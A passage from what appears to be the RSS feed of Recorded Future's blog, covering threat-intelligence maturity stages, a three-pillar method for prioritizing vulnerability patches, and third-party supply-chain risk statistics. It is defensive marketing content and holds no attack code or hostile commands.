        <p>In the Reactive stage, organizations are still fighting fires. <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Various forms of intelligence</a> are consumed, but rarely operationalized. Analysts <a href="https://www.recordedfuture.com/blog/why-manual-cyber-operations-can-create-dangerous-gaps">manually investigate alerts</a>, cross reference indicators, and often rely on intuition or Google searches to make sense of raw data.</p>
        <p>This stage is typical for teams suffering from alert fatigue or lacking dedicated threat intelligence personnel. Intelligence feeds may be connected to security tools, but without clear processes, much of that data sits unutilized.</p>
        <p><strong>Characteristics of a Reactive Organization</strong></p>
        <ul>
          <li>Focused on detection and containment.</li>
          <li>Success means closing incidents, not necessarily preventing them.</li>
          <li>However, this stage is where the foundation for maturity is built.</li>
        </ul>
        <p><strong>Pain Points and Challenges</strong></p>
        <ul>
          <li>Overload without insight: Teams receive too many alerts to analyze effectively.</li>
          <li>Siloed tools and workflows: Intelligence isn’t integrated across the stack.</li>
          <li>Limited automation: Manual lookups and enrichment dominate response time.</li>
          <li>High dwell time: Threats are detected after the fact, often too late for meaningful containment.</li>
        </ul>
        <p><strong>Steps to Advance</strong></p>
        <ul>
          <li>Centralize intelligence feeds into a single operational view.</li>
          <li>Automate enrichment of alerts with high-confidence threat indicators.</li>
          <li>Establish workflows for classifying, triaging, and escalating alerts based on context.</li>
          <li>Begin correlating IOCs with known campaigns or adversary tactics.</li>
        </ul>
        <p><strong>Success Indicators and KPIs</strong></p>
        <p>Across the industry, certain standards, KPIs and other measures have emerged to help orient and assess one’s progress through each stage of the maturity journey. For the Reactive stage, these include:</p>
        <ul>
          <li>Reduction in duplicate or “known bad” alerts.</li>
          <li>Decrease in manual investigations per analyst.</li>
          <li>Improved Mean Time to Triage (MTTT): faster analysis of known threats.</li>
          <li>Greater integration between intelligence feeds and alert management.</li>
        </ul>
        <p>The Reactive stage is about laying the groundwork for operationalized intelligence, consolidating data and reducing noise so analysts can focus on meaningful threats. Once teams can respond consistently and efficiently, they’re ready to evolve toward a proactive posture.</p>
        <h3>Stage 2: Proactive—Preventing Known Threats</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1fc1b038d0f8112a450d00812f76e30ff86907e12.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="400" />
        </p>
        <p>The Proactive stage marks a crucial transition from reacting to known events to actively preventing them. Here, organizations begin to enrich alerts with context, prioritize risk, and use intelligence to inform vulnerability management and threat hunting.</p>
        <p>Teams at this stage have moved beyond basic detection. They use intelligence to drive decision-making, asking “What matters most to us?” instead of simply responding to what the feeds say.</p>
        <p><strong>Characteristics of a Proactive Organization</strong></p>
        <ul>
          <li>Security teams conduct regular threat hunting exercises to identify indicators of compromise before alerts fire.</li>
          <li>Vulnerability management programs are intelligence-led, prioritizing patches based on real-world exploitation trends.</li>
          <li>Analysts can articulate threat actor behaviors and motivations, not just indicators.</li>
          <li>Intelligence is beginning to inform executive-level reporting and risk assessments.</li>
        </ul>
        <p><strong>Pain Points and Challenges</strong></p>
        <ul>
          <li>Context overload: Adding intelligence without prioritization can still create noise.</li>
          <li>Scaling analysis: Manual research can’t keep up with threat volume.</li>
          <li>Communication gaps: Intelligence insights may not reach decision-makers fast enough.</li>
        </ul>
        <p><strong>Steps to Advance</strong></p>
        <ul>
          <li>Integrate enrichment and context directly into alert workflows.</li>
          <li>Use intelligence to prioritize vulnerabilities being actively exploited in the wild.</li>
          <li>Establish a repeatable threat hunting process tied to known tactics, techniques and procedures (TTPs).</li>
          <li>Create basic reporting dashboards to show intelligence-driven outcomes to leadership.</li>
        </ul>
        <p><strong>Success Indicators and KPIs</strong></p>
        <p>As outlined above, industry best practices and our own internal expertise has helped to inform clear indicators of success and measurable KPIs to help you traverse this stage:</p>
        <ul>
          <li>Further reduction in Mean Time to Respond (MTTR) and faster full-cycle incident resolution.</li>
          <li>Increase in incidents identified through proactive hunting.</li>
          <li>Decrease in unpatched, high-risk vulnerabilities.</li>
          <li>More consistent cross-departmental sharing of intelligence insights.</li>
        </ul>
        <p>Proactive organizations are no longer purely reactive responders; they are early detectors. They use operational cyber threat intelligence to stop known attacks before they strike, ridging the gap between detection and prevention.</p>
        <h3>Stage 3: Predictive—Anticipating What’s Next</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_182c7617c0aa63432375b741a10c23a269f507446.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="400" />
        </p>
        <p>At the Predictive stage, organizations transform from defenders into forecasters. Intelligence isn’t just about identifying active threats. It’s about anticipating what adversaries will do next.</p>
        <p>Predictive intelligence uses advanced analytics, automation, and pattern recognition to reveal emerging campaigns, shifting tactics, and vulnerabilities before they’re exploited. At this stage, intelligence becomes strategic, influencing not just SOC operations but enterprise-wide risk management and planning.</p>
        <p><strong>Characteristics of a Predictive Organization</strong></p>
        <ul>
          <li>Security and risk teams share a unified intelligence strategy.</li>
          <li>Machine learning and AI tools help identify evolving threat trends.</li>
          <li>Insights extend beyond cyber to supply chain, digital risk, and geopolitical factors.</li>
          <li>The organization uses predictive intelligence to guide security investment decisions.</li>
        </ul>
        <p><strong>Pain Points and Challenges</strong></p>
        <ul>
          <li>Data interpretation: Turning predictive signals into actionable decisions.</li>
          <li>Cross-functional alignment: Intelligence must inform departments beyond security (legal, procurement, communications).</li>
          <li>Maintaining analyst trust in automation, ensuring predictive systems remain transparent and explainable.</li>
        </ul>
        <p><strong>Steps to Advance</strong></p>
        <ul>
          <li>Combine internal telemetry with external intelligence for a 360° threat view.</li>
          <li>Monitor emerging TTPs and map them to organizational exposures.</li>
          <li>Develop scenario-based playbooks informed by predictive analysis.</li>
          <li>Use predictive insights to shape security budgets and executive strategy.</li>
        </ul>
        <p><strong>Success Indicators and KPIs</strong></p>
        <ul>
          <li>Significant reduction in average dwell time (threats neutralized before causing damage).</li>
          <li>Overall percentage of threats mitigated before exploitation.</li>
          <li>Increased accuracy of threat forecasting.</li>
          <li>Improved strategic alignment between security and business objectives.</li>
        </ul>
        <p>The Predictive stage represents the maturation of threat intelligence operations. Security becomes a forward-looking function—one that can anticipate risk and shape outcomes, rather than merely react and respond to them.</p>
        <h3>Stage 4: Autonomous—Intelligence at Machine Speed</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1c74008a813f7e84c128161a489a5f6ffbf9b477f.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="400" />
        </p>
        <p>The Autonomous stage represents the pinnacle of operational cyber threat intelligence maturity. At this point, intelligence systems and <a href="https://www.recordedfuture.com/blog/how-the-right-ai-enables-an-autonomous-future">AI-driven automation</a> operate continuously: detecting, analyzing, and responding to threats with minimal human intervention.</p>
        <p>Here, human analysts focus on strategic research, oversight, and long-term planning while machines handle routine detection and response. Intelligence is fully operationalized, driving every aspect of the security ecosystem in real time.</p>
        <p><strong>Characteristics of an Autonomous Organization</strong></p>
        <ul>
          <li>Threat intelligence is deeply integrated across all systems and workflows.</li>
          <li>AI and automation enable continuous detection and response without manual triggers.</li>
          <li>The organization has global visibility into digital, third-party, and geopolitical risks.</li>
          <li>Threat intelligence is recognized as a strategic business differentiator.</li>
        </ul>
        <p><strong>Pain Points and Challenges</strong></p>
        <ul>
          <li>Governance and oversight: Ensuring automated decisions remain transparent and aligned with policy.</li>
          <li>Cultural adaptation: Building trust in autonomous operations among leadership and analysts.</li>
          <li>Optimization: Continuously tuning models and workflows for performance and precision.</li>
        </ul>
        <p><strong>Steps to Advance</strong></p>
        <ul>
          <li>Expand autonomous intelligence integration across the full security stack.</li>
          <li>Enable continuous enrichment of intelligence data for context-aware decision-making.</li>
          <li>Automate rule creation and response playbooks based on live threat insights.</li>
          <li>Use AI to generate executive-level summaries and automated intelligence reporting.</li>
        </ul>
        <p><strong>Success Indicators and KPIs</strong></p>
        <ul>
          <li>High rate of automated response actions.</li>
          <li>Continuous reduction in dwell time.</li>
          <li>Consistent threat mitigation without human escalation.</li>
          <li>Cross-functional visibility and reporting of intelligence outcomes.</li>
        </ul>
        <p>In the Autonomous stage, the line between intelligence and action disappears. Security operations are intelligence-led and self-improving, creating a closed-loop system that operates at the same speed as the adversaries it defends against.</p>
        <h2>Fueling the Engine: How Intelligence Powers Every Stage</h2>
        <p>Progression through these maturity stages depends on the quality, breadth, and automation of the <a href="https://www.recordedfuture.com/threat-intelligence-101/tools-and-technologies">underlying intelligence platform</a>. Recorded Future’s ecosystem exemplifies this principle—providing comprehensive data, contextual insights, and machine-speed automation to advance organizations along the maturity curve.</p>
        <div>
          <div>
            <div>
              <h2>Stage</h2>
            </div>
            <div>
              <h2>Primary Intelligence Focus</h2>
            </div>
            <div>
              <h2>Outcome</h2>
            </div>
          </div>
          <div>
            <div>Reactive</div>
            <div>High-confidence indicator feeds (IPs, domains, hashes).</div>
            <div>Faster triage and response to known threats.</div>
          </div>
          <div>
            <div>Proactive</div>
            <div>Context-rich intelligence: vulnerability data, actor profiles, and exploit trends.</div>
            <div>Prioritized patching and early threat detection.</div>
          </div>
          <div>
            <div>Predictive</div>
            <div>Strategic insights: TTPs, campaign monitoring, and predictive modeling.</div>
            <div>Anticipation of future threats and informed investments.</div>
          </div>
          <div>
            <div>Autonomous</div>
            <div>Always-on AI-driven analysis and automation.</div>
            <div>Continuous detection, response, and operational resilience.</div>
          </div>
        </div>
        <p>At every stage, operational cyber threat intelligence is both the fuel and the framework for progress. It informs decisions, shapes response playbooks, and empowers organizations to act faster, smarter, and with greater confidence.</p>
        <h2>Your Next Move on the Journey to Operational Intelligence Maturity</h2>
        <p>Operationalizing threat intelligence is not a single milestone, it’s a journey. Each stage builds upon the last, requiring time, structure, and deliberate investment in people, process, and intelligence integration. Just like a human learning to crawl, walk, run, and sprint, the journey towards maturity is rich with both challenges and rewards.</p>
        <p>The key is honest assessment:</p>
        <ul>
          <li>Are you still chasing alerts in a reactive, ad hoc fashion?</li>
          <li>Have you begun to anticipate known threats through proactive hunting and prioritization?</li>
          <li>Are you using predictive analytics to anticipate emerging risks?</li>
          <li>Or have you reached autonomous operations, where intelligence drives decisions at machine speed?</li>
        </ul>
        <p>Wherever you are today, your next move determines how effectively your organization can predict, prevent, and protect against tomorrow’s threats.</p>
        <p>Whether you’re integrating your first intelligence feed or orchestrating fully <a href="https://www.recordedfuture.com/products/autonomous-threat-operations">autonomous threat response</a>, Recorded Future provides the data, context, and automation to accelerate your journey toward operational cyber threat intelligence maturity.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_190a9f903d9fbd7b56c2e00fd894596d5b7793258.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Addressing the vulnerability prioritization challenge]]></title>
            <link>https://www.recordedfuture.com/blog/addressing-the-vulnerability-prioritization-challenge</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/addressing-the-vulnerability-prioritization-challenge</guid>
            <pubDate>Tue, 18 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Struggling with vulnerability overload? Learn why CVSS scores alone aren't enough—and how a three-pillar framework using real-world threat intel, environmental context, and organizational realities can help you prioritize what truly matters.]]></description>
            <content:encoded><![CDATA[
        <p>How do you prioritize what vulnerabilities to patch when you have thousands of alerts and critical remote code execution flaws buried next to low-priority information disclosures?</p>
        <p><a href="https://www.recordedfuture.com/blog/when-vulnerability-information-flows-are-vulnerable-themselves">MITRE's CVE List</a> grows by dozens or even hundreds of entries daily. Your team can’t patch everything.</p>
        <p>With some organizations facing tens of thousands of vulnerability alerts each month, it’s clear that detection isn't the problem anymore. The challenge that keeps vulnerability management teams up at night is prioritization. With limited resources and maintenance windows, you can't patch everything immediately. You need to know what matters most.</p>
        <p>Relying on universal CVSS scores that aren't specific to your organization <a href="https://www.recordedfuture.com/blog/risk-based-vulnerability-cvss-doesnt">won't solve this prioritization challenge</a>. A vulnerability might score 9.8 on the CVSS scale, suggesting catastrophic risk, yet never be exploited in the wild. Meanwhile, a 7.5-rated vulnerability could be actively fueling ransomware campaigns targeting your industry right now.</p>
        <h2>Why CVSS alone falls short</h2>
        <p>CVSS serves a purpose. It provides a standardized way to measure the theoretical severity of vulnerabilities based on their technical characteristics. It tells you how bad things could get if someone exploits a vulnerability under ideal conditions. That's valuable information, but it's only part of the story.</p>
        <p>CVSS can't tell you whether cybercriminals are actively exploiting a vulnerability. It doesn't know if ransomware groups have weaponized it or if working exploit code is circulating in the wild. It can't assess whether a vulnerability affects your critical payment processing systems or an isolated test server. And it certainly can't determine whether you can actually deploy a patch without breaking essential business operations.</p>
        <p>This gap between theoretical risk and practical reality creates a dangerous blind spot. Teams end up in one of two traps: either they try to patch everything rated "critical" or "high," burning out their staff and disrupting operations, or they become numb to the constant stream of high scores and miss the vulnerabilities that truly matter.</p>
        <p>The solution isn't to abandon CVSS. The solution is to enhance it with real-world context. You need a framework that answers the questions CVSS can't address. That's where the three-pillar approach transforms vulnerability management from overwhelming to actionable.</p>
        <h2>The three-pillar framework: your guide to modern prioritization</h2>
        <p>The three-pillar framework provides a systematic approach to cut through the noise, identify what truly requires immediate action, and clearly communicate the evidence to defend those decisions to patching teams and leadership.</p>
        <p>Each pillar answers a fundamental question that transforms raw vulnerability data into actionable intelligence. Together, they help give you the context needed to confidently prioritize your patching efforts and communicate those priorities to stakeholders who need to understand why certain vulnerabilities jump to the front of the queue.</p>
        <h3>Intelligence pillar: how likely is exploitation?</h3>
        <p>The first pillar shifts your focus from theoretical to actual risk. While CVSS measures how severe a vulnerability could be in theory, the intelligence pillar asks the questions that matter in practice for your organization:</p>
        <ul>
          <li>Is anyone actually exploiting this vulnerability?</li>
          <li>Are ransomware groups using it in active campaigns?</li>
          <li>Does proof-of-concept (PoC) code exist in the wild?</li>
          <li>Is exploitation trending upward or remaining dormant?</li>
        </ul>
        <p>Consider this scenario, your scanner flags two vulnerabilities:</p>
        <ul>
          <li>The first has a CVSS score of 10, but it’s never been observed in real-world attacks.</li>
          <li>The second has a CVSS of 7.5 but appears in ongoing ransomware campaigns targeting organizations in your industry.</li>
        </ul>
        <p>Which deserves your immediate attention? The intelligence pillar provides the critical context that the second vulnerability may take priority.</p>
        <p>The Intelligence pillar provides this critical context. It transforms abstract severity scores into actionable threat intelligence by revealing which vulnerabilities are actually being exploited in the wild. Without this intelligence layer, you're essentially patching blind, potentially spending weeks addressing theoretical risks while missing the vulnerabilities criminals are actively using.</p>
        <h3>Environmental pillar: what’s your specific risk?</h3>
        <p>A vulnerability doesn't exist in isolation. Where it lives in your environment determines its actual risk to your organization. The Environmental pillar forces you to map generic vulnerability data to your specific infrastructure and business context.</p>
        <p>The same vulnerability presents vastly different risk profiles depending on its location:</p>
        <ul>
          <li>Is it on an internet-facing payment server or an air-gapped development system?</li>
          <li>Does it affect one legacy application or your entire server fleet?</li>
          <li>Are the vulnerable systems processing customer data or internal test data?</li>
          <li>Do these systems connect to critical business partners or operate in isolation?</li>
        </ul>
        <p>Scale matters too. A CVSS 9.0 vulnerability affecting one isolated system generally poses less organizational risk than the same vulnerability present across hundreds of production servers. When two vulnerabilities have equal severity and exploitation likelihood, the one touching more assets typically deserves priority. More exposure points mean more opportunities for compromise and greater remediation complexity.</p>
        <p>CVSS treats every vulnerability as equal, yet modern vulnerability management teams have learned that environmental context proves otherwise. A SQL injection vulnerability on your public e-commerce platform demands different treatment than the same flaw on an internal reporting tool. The environmental pillar captures these crucial distinctions.</p>
        <p>By mapping vulnerabilities to your actual infrastructure, you move from broad categorizations to precise, business-aligned priorities. This isn't about making excuses for delayed patching. It's about ensuring your limited resources protect what matters most to your organization.</p>
        <h3>Organizational pillar: can you actually fix it?</h3>
        <p>Even the most critical vulnerability becomes meaningless if you can't address it. The Organizational pillar acknowledges a reality that pure risk scoring ignores: your ability to actually implement fixes varies dramatically across your infrastructure.</p>
        <p>This pillar addresses practical constraints:</p>
        <ul>
          <li>Does a patch exist from the vendor?</li>
          <li>Will deploying it break critical business operations?</li>
          <li>Do you have administrative access to the affected systems?</li>
          <li>Can you meet change control requirements for production systems?</li>
          <li>Are there compensating controls that reduce risk without patching?</li>
        </ul>
        <p>Resource limitations shape what's possible:</p>
        <ul>
          <li>Your single vulnerability management engineer can't tackle the same volume as a dedicated team of ten.</li>
          <li>Budget constraints might prevent upgrading legacy systems.</li>
          <li>Maintenance windows might only occur quarterly for critical infrastructure.</li>
        </ul>
        <p>For better or worse, these realities determine which vulnerabilities you can meaningfully address.</p>
        <p>The organizational pillar transforms these constraints into strategic advantages by focusing efforts where you can achieve real risk reduction rather than pretending every vulnerability is equally fixable. This means prioritizing ten medium-severity vulnerabilities you can patch this weekend over a critical vulnerability requiring a six-month system overhaul, while also revealing opportunities for alternative risk reduction. By acknowledging what you can't change, you identify creative solutions for what you can control.</p>
        <p>This doesn’t mean you should disregard vulnerabilities you cannot immediately patch. Adding these to a watch list ensures you're alerted when their risk profile changes; when proof-of-concept code appears, exploitation becomes likely, or active attacks begin. This heightened awareness lets you adjust compensating controls or expedite remediation efforts as the threat landscape evolves.</p>
        <p>Most importantly, this pillar provides the business context that resonates with leadership. When you explain that fixing vulnerability X requires shutting down manufacturing for a week while vulnerability Y can be addressed during normal maintenance, priorities become clear. You're not making excuses. You're making informed business decisions about risk.</p>
        <h2>Transforming communication and action</h2>
        <p>Armed with insights from all three pillars, you transform how you communicate about vulnerabilities both within your security team and to leadership. This targeted, evidence-based approach cuts through patch fatigue and clearly articulates why specific vulnerabilities demand immediate attention.</p>
        <p>Stop saying: "We have 1,000 critical vulnerabilities to patch this month."</p>
        <p>Start saying: "We've identified 10 vulnerabilities being actively exploited by three ransomware groups that specifically target financial services organizations. Eight affect our payment processing systems, and we can patch them this weekend. Two require vendor fixes we're tracking closely, but we've implemented network segmentation to reduce exposure."</p>
        <p>This specificity matters. When you can show leadership that APT groups with proven intent to target your industry are actively exploiting certain vulnerabilities, priorities become crystal clear. You're not just citing CVSS scores; you're demonstrating real threats from real adversaries using real attack methods.</p>
        <p>This communication shift works at every level:</p>
        <div>
          <div>
            <div></div>
            <div></div>
          </div>
          <div>
            <div>For Executives:</div>
            <div>Focus on business impact and risk reduction, not technical scores.</div>
          </div>
          <div>
            <div>For IT Operations:</div>
            <div>Provide clear justification for emergency patches versus planned updates.</div>
          </div>
          <div>
            <div>For Development Teams:</div>
            <div>Explain why certain fixes need priority in the next sprint.</div>
          </div>
          <div>
            <div>For Auditors:</div>
            <div>Demonstrate a mature, risk-based approach to vulnerability management</div>
          </div>
        </div>
        <p>When you ground your recommendations in real-world exploitation data, business context, and practical constraints, you build credibility. Teams stop seeing vulnerability management as crying wolf about every high CVSS score. Instead, they recognize you as a strategic partner who understands both security risks and business realities.</p>
        <h2>Making the three pillars work: the role of intelligence</h2>
        <p>The three-pillar framework transforms vulnerability prioritization, but requires <a href="https://www.recordedfuture.com/platform/intelligence-graph">comprehensive, real-time threat intelligence</a> to avoid guesswork. Manually researching thousands of vulnerabilities for exploitation evidence, mapping them to your environment, and tracking patches isn't sustainable. Teams need continuously updated, contextually relevant intelligence that's immediately actionable through automation to leverage this framework.</p>
        <p>Recorded Future's <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a> Module delivers real-time exploitation data from across the web, tracking vulnerabilities from proof-of-concept to active threat actor use.<br />Dynamic risk scoring automatically factors in your environmental context and organizational constraints. Lifecycle monitoring alerts you the moment patches become available or exploitation begins. <a href="https://www.recordedfuture.com/blog/use-a-threat-map-to-visualize-your-cyber-threats">Threat Maps</a> visualize which actors target your industry and the CVEs they’re exploiting to do so, helping you correlate your vulnerabilities with attackers' specific TTPs.</p>
        <p>Organizations using Vulnerability Intelligence report saving 15.9 hours per week on investigation and achieving 86% reduction in unplanned downtime. Instead of drowning in CVSS scores, these teams know exactly <a href="https://www.recordedfuture.com/use-case/exposure-management">which exposures demand immediate attention</a> and can articulate why. They patch what matters before it impacts their business.</p>
        <p>Ready to see the three-pillar framework in action? <a href="https://recordedfuture.ondemand.goldcast.io/on-demand/4efc8e29-c286-40af-91aa-7cb3eee300a5">Watch our workshop webinar</a> where security experts demonstrate how Vulnerability Intelligence transforms overwhelming vulnerability data into clear, defensible priorities that protect what matters most. If you are a current user interested in learning more about how your team can <a href="https://www.recordedfuture.com/services#:~:text=Our%20onboarding%20service%20ensures%20your,Recorded%20Future%20University%20offers:">more effectively prioritize Alerts with Vulnerability Intelligence</a>, reach out to your Customer Success Manager to schedule a consultation.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_182edadffd3e984b13663e305ab0f61d712b8c845.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Third-Party Risk Statistics]]></title>
            <link>https://www.recordedfuture.com/blog/third-party-risk-statistics</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/third-party-risk-statistics</guid>
            <pubDate>Thu, 13 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore the latest third-party risk statistics and learn how data-driven, continuous monitoring for third-party risk assessments can protect your supply chain..]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Third-party risk is escalating. In 2024, <a href="https://www.verizon.com/business/resources/reports/dbir/?cmp=2025:05:ge:us::ns:pre:pse:goo::ao:8888855284:_ds_cid_12663792230_ds_agid_120689634176&amp;utm_term=2025%20verizon%20dbir&amp;utm_medium=cpc&amp;utm_source=google&amp;utm_campaign=GGL_BND_Security_Exact&amp;utm_content=Enterprise&amp;gclsrc=aw.ds&amp;gad_source=1&amp;gad_campaignid=12663792230&amp;gbraid=0AAAAABymyRHhg5JOGBOV1X5-Dv-fQUW-x&amp;gclid=Cj0KCQjwmYzIBhC6ARIsAHA3IkS_jbkuugdrvUCFFSOo4FNdNiUK-HNDd_DT2ciS_EklV92OV67KJU4aAt7MEALw_wcB">30% of breaches</a> involved a third-party vendor, twice as much as the previous year.</li>
        </ul>
        <ul>
          <li>Static assessments are no longer enough. Questionnaire-based audits provide only outdated snapshots, leaving organizations blind to evolving threats between review cycles.</li>
          <li>Continuous, intelligence-led monitoring is essential. Real-time visibility into vendors’ external security posture enables faster detection, objective risk scoring, and proactive defense.</li>
          <li>Recorded Future’s Third-Party Intelligence closes the gap. By continuously tracking over 5 million organizations and 1 million technology products, it gives security teams the data-driven insight needed to stay ahead of emerging supply chain threats.</li>
        </ul>
        <h2>The Modern Supply Chain: A Widening Attack Surface</h2>
        <p>The digital supply chain has undergone a profound transformation. What was once a small network of trusted vendors has evolved into a vast, interconnected web of technologies, platforms, and data flows.</p>
        <p>Cloud providers now host mission-critical infrastructure. SaaS platforms handle sensitive data. Managed service providers, subcontractors, and open-source libraries form the unseen backbone of daily operations. Each of these relationships expands the attack surface, introducing new dependencies and new vulnerabilities.</p>
        <p>A single vendor today may rely on dozens of others, each with its own third- and fourth-party relationships. The result is an ecosystem of thousands of potential ingress points, with many of them outside an organization’s direct line of sight. These dependencies are often invisible beyond the first tier, leaving businesses exposed to risks they may not even know exist.</p>
        <p>Cybercriminals understand this. Supply chain compromises have become a preferred strategy for attackers because infiltrating a vendor is often easier and more scalable than targeting an organization directly. By compromising one trusted connection, adversaries can pivot to dozens of downstream victims, often before the original breach is even detected.</p>
        <p>This expanding ecosystem demands a new approach. Securing the modern digital supply chain requires continuous, intelligence-led visibility, one that provides an external, real-time view of every partner and vendor’s security posture. Only with ongoing, data-driven insight can organizations uncover hidden exposures and detect emerging threats before small weaknesses become systemic failures.</p>
        <h2>The Unavoidable Truth: Key Third-Party Risk Statistics for 2025</h2>
        <p>Every year, the volume, cost, and complexity of vendor-related breaches continue to rise, exposing weaknesses that traditional risk management can’t contain. The following third-party risk statistics illustrate just how pervasive the problem has become and why a new approach is urgently needed.</p>
        <h3>Frequency and Volume</h3>
        <p>Third-party breaches are no longer isolated events. They are becoming a defining feature of the modern threat landscape.</p>
        <p>According to Verizon’s most recent Data Breach Investigations Report, 30% of breaches involved a third-party vendor, twice as much as the previous year. However, this figure is likely conservative due to underreporting and misclassification, especially when the compromise occurs several layers deep in their vendor ecosystem.</p>
        <h3>Financial Impact</h3>
        <p>According to <a href="https://www.ibm.com/account/reg/us-en/signup?formid=urx-53830">IBM’s 2024 Cost of a Data Breach</a> report, the average cost of a third-party breach is over $5.08 million. Highly regulated sectors such as healthcare and finance face even steeper costs.</p>
        <p>The true financial impact of a breach extends beyond the initial response, encompassing lost revenue, increased cyber insurance premiums, and reputational damage that drives customer churn. Organizations may also face expensive marketing and PR efforts to restore trust after a high-profile supply chain incident.</p>
        <p>Dwell time — the duration between initial compromise and detection — compounds these costs. In 2024, organizations with a dwell time beyond 200 days faced average breach costs of $5.01 million.</p>
        <p><a href="https://www.gartner.com/en/documents/4013508">Gartner research</a> reveals that third-party breaches cost roughly 40% more to remediate than those that originate within an organization’s own systems, due to the additional complexity of managing incidents that span multiple entities, legal jurisdictions, and data environments. When breaches involve personally identifiable information (PII), PHI, or payment card data, costs can climb even higher as regulatory penalties and legal exposure multiply.</p>
        <h3>Hidden Dangers: Fourth-Party and Nth-Party Risk</h3>
        <p>Modern supply chains extend far beyond the vendors an organization directly manages. Each third-party relationship is underpinned by its own network of fourth and nth parties—subcontractors, technology providers, and cloud services. These indirect dependencies create exposure that most organizations can neither see nor control.</p>
        <p>According to Whistic’s <a href="https://6236605.fs1.hubspotusercontent-na1.net/hubfs/6236605/Marketing%20Collateral/2024-TPRM-Report.pdf">2024 Third-Party Risk Management Impact Report</a>, half of all companies work with more than 100 vendors, up from 38% in 2023. And for each third-party vendor in a supply chain, organizations typically have indirect relationships with nearly 14 times more fourth and fifth parties, according to <a href="https://2477095.fs1.hubspotusercontent-na1.net/hubfs/2477095/Nth%20Party%20Degree%20Report%20Dec%202023/RiskRecon_NthParty_Report_Dec%202023.pdf?__hstc=127855378.3ab44d155ecb3495e4def12973d6c601.1761591407434.1761591407434.1762273265238.2&amp;__hssc=127855378.2.1762273265238&amp;__hsfp=501937303&amp;hsCtaTracking=af9a93e2-8079-4f32-bf38-32016127808a%7Ca63b764c-431d-47bf-9481-524e3677291b">The Cyentia Institute</a>.</p>
        <p>These numbers underscore the growth of interconnected risk. Each new supplier introduces dozens of unseen connections, and every one of those connections can become an attacker’s entry point. The impact can quickly cascade through shared platforms, APIs, and service providers, affecting multiple tiers of partners and customers.</p>
        <p>The <a href="https://therecord.media/progress-software-elevates-severity-bug">MOVEit breach</a> of 2023 is a prime example. What began as a single vulnerability in one file transfer application rapidly spread across thousands of organizations, from banks and universities to government agencies. Many of those affected never had a direct contract with the compromised vendor.</p>
        <h2>Why Traditional Third-Party Risk Assessments Are Failing</h2>
        <p>For many organizations, third-party risk management still relies on the same tools and tactics used a decade ago—static checklists, self-reported questionnaires, and periodic audits. These methods were designed for a slower, more predictable vendor landscape. Today, they’re simply outmatched by the size and interconnectivity of modern supply chains.</p>
        <p>Vendor questionnaires and checklists are only as good as the answers provided. Too often, the information is outdated, incomplete, or inaccurate, leaving security teams with a false sense of assurance. These assessments might capture what a vendor’s security looked like at a single moment in time, but attackers don’t wait for your next scheduled check-in. Every day between audits is another opportunity for adversaries to exploit newly discovered vulnerabilities or misconfigurations.</p>
        <p>Static assessment programs also lack the scale and speed required to monitor hundreds or thousands of vendors effectively. As the vendor ecosystem expands, traditional approaches simply can’t keep pace with the dynamic nature of today’s threat environment.</p>
        <p>The data underscores just how strained these legacy methods have become:</p>
        <ul>
          <li><a href="https://www.riskrecon.com/state-of-third-party-risk-management-2024">44%</a> of organizations assess more than 100 third parties each year, yet only 4% of organizations have high confidence that their third-party questionnaires accurately reflect real-world risk.</li>
          <li>Nearly <a href="https://www.ey.com/content/dam/ey-unified-site/ey-com/en-gl/services/consulting/documents/ey-gl-2025-ey-global-third-party-risk-management-survey-05-2025.pdf">four in ten companies</a> use multiple questionnaires for different risk domains, sending an average of 55 questionnaires to third parties annually.</li>
        </ul>
        <p>These numbers reveal a troubling paradox: organizations are spending more time than ever assessing vendors but gaining less clarity than ever in return. Without continuous, intelligence-led visibility, even the most diligent third-party risk programs are operating one step behind and measuring compliance rather than managing risk.</p>
        <h2>Shifting from Assessment to Intelligence: A Better Approach</h2>
        <p>Traditional third-party risk assessments expose the limits of hindsight. <a href="https://www.recordedfuture.com/threat-intelligence-101/risk-assessment-management/third-party-risk-management">Intelligence-led monitoring</a> delivers the advantage of foresight.</p>
        <p>Static questionnaires stop at the vendor’s last self-reported status, which quickly becomes obsolete when adversaries move by the hour. An intelligence-based approach, by contrast, looks outward to live signals, behavioral patterns, and threat activity that reflect a vendor’s true security posture in real time.</p>
        <p>The core shift is from <strong>assessment</strong> to <strong>intelligence</strong>.</p>
        <ul>
          <li><strong>Assessments</strong> capture what vendors say about their defenses.</li>
          <li><strong>Intelligence</strong> reveals what attackers see (and often what vendors don’t yet know).</li>
        </ul>
        <p>This change is more than a process upgrade; it’s an evolution in how organizations manage supply chain security. Continuous, intelligence-led monitoring replaces static snapshots with ongoing, data-driven visibility across every tier of the vendor ecosystem.</p>
        <p>By ingesting indicators from the open web, dark web, and technical telemetry, organizations can identify vulnerabilities or emerging exploit chatter as they happen—not months after the fact. The advantages are clear:</p>
        <ul>
          <li><strong>Proactive vs. Reactive:</strong> Intelligence shifts third-party risk from response to prevention, allowing teams to identify issues before they evolve into breaches.</li>
          <li><strong>Objective vs. Subjective:</strong> Real-world data replaces self-attestation, grounding risk decisions in observable evidence rather than vendor claims.</li>
